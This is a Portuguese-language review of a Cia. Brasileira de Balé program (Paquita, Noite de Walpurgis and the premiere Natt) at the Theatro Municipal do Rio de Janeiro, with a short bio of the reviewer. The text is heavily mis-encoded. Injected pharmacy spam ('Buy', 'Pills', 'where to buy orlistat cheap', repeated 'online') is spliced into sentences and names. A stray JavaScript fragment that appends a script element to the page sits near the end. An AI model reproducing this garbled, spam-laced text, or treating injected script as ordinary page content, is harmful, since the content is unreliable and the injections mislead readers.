Balé/DançaCríticaLateralRio de Janeiro

Cia. Brasileira de BalA� no Municipal RJ

Com grande satisfaA�A?o, assisti ao trabalho da Cia. Brasileira de BalA�.

Uma companhia que tem histA?ria no cenA?rio nacional, liderada pelo coreA?grafo e diretor Buy Jorge Teixeira, idealizador que acredita na arte como uma oportunidade de transformaA�A?o. Um cultivador de talentos que agrega e realiza. Na noite de 13 de outubro, foram apresentados o balA�A� online Pills Paquita, com mA?sica de Ludwig Minkus e coreografia de Marius PetipA?, e Noite de Walpurgis, comA�mA?sica de GounodA�e coreografia original de Lavrovski, salientando-se a estreia de Natt, de Rafael Gomes.

Teixeira contou com a participaA�A?o especial de solistas do Theatro Municipal do Rio de Janeiro, como Melissa Oliveira e Murilo Gabriel.A�TambA�m contou com aA�participaA�A?o da primeira bailarina Karen Mesquita, todos ex-integrantes daA�companhia.

Em Paquita,A�Melissa Oliveira,A�segunda solista do TMRJ, e Murilo Gabriel estiveramA�muito entrosados. Murilo estA? numa fase de ascensA?o a maiores oportunidades, pois possui uma tA�cnica limpa. Sua danA�a nA?o se caracteriza por movimentos circenses, agora infelizmente em moda. Pelo contrA?rio, sua danA�a revela o que se espera de um “dancer noble”, em queA�a arte A� a protagonista. Melissa promete um futuro promissor. Aguardemos!

Gostaria de destacar a atuaA�A?o da bailarina online AlA�cia Saul na variaA�A?o dos grandes fouettes em Paquita: foi brilhante. Jovem de tA�cnica impecA?vel, alA�m de uma delicadeza natural que se espera de uma bailarina. Brava! Outro destaque da Cia. A� a bailarina Gabrielly JuvA?ncio, na variaA�A?o dos grandes saltos,A�de grande excelA?ncia, mostrando tA�cnica e suavidade.

No Corpo de Baile, chamou aA�atenA�A?o a presenA�a cA?nica da bailarina Brenda Gabrielle Order . Notei, em todo o conjunto, um certo rigor excessivo na execuA�A?o coletiva. Talvez um pouco mais de elegA?ncia e suavidade dessem o toque final para uma melhor performance do Corpo de Baile nesse balA�.

Na segunda parte do programa, Noite de Walpurgis, de Charles Gounod, considerado o ato mais marcante da A?pera Fausto. Coreografia original de Lavrovski.

where to buy orlistat cheap Alyson Trindade online fez um Fausto caracterA�stico sem deixar de lado todo refinamento e impecabilidade tA�cnica. Um bailarino pronto para alA�ar os grandes palcos.

Karen Mesquita inundou o pA?blico de emoA�A?o em grande excelA?ncia tA�cnica. Sua Margarida foi marcada por elementos que reafirmam seu tA�tulo mA?ximo profissional. O balA� de Karen A� marcado por capacidade, talento e exatidA?o aliados a bom gosto e refinamento que culminam em uma trajetA?ria de sucesso.

Breno LucenaA�A� o artista a serviA�o de sua arte. A� perceptA�vel o domA�nio da aA�A?o na emoA�A?o. Um bailarino de total domA�nio tA�cnico, com uma presenA�a cA?nica A�mpar. Exemplo de dedicaA�A?o e amorA�A� sua companhia.

Na estreia da nova coreografia Natt, online desenvolvida especialmente para o conjunto, o pA?blico A� brindado pela performance da bailarina principal Yasmim Lomondo. Uma obra em que o coreA?grafo consagra os bailarinosA�com suas principais habilidades. EstilosA�contemporA?neo e neoclA?ssico interagem em plena harmonia. Bonito ver bailarinos dominando os diversos meios de comunicaA�A?o da danA�a, como ocorre nas principais companhias de balA� do mundo.

A Companhia Brasileira de BalA� A� o exemplo vivo de que arte feita com paixA?o e dedicaA�A?o supera qualquer obstA?culo. ParabA�ns, Jorge Teixeira!

d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);

Wellen Barros
Wellen Barros – Cantora Lírica integrante dos corpos artísticos do Theatro Municipal do Rio de Janeiro. Concluiu Bacharelado em Música pelo Conservatório de Música de Niterói. Formada em História da Dança pela UNIDANÇA. Atua como preparadora vocal para atores na Companhia de Teatro Recontando Conto. Possui especialização em Shakespeare tendo como Mestra Bárbara Heliodora. Atualmente desenvolve pesquisa sobre Verdi e sua dramaticidade teatral. Autora da Biografia da primeira bailarina do Theatro Municipal do Rio de Janeiro – Cecília Kerche para o Figuras da Dança da São Paulo Companhia de Dança.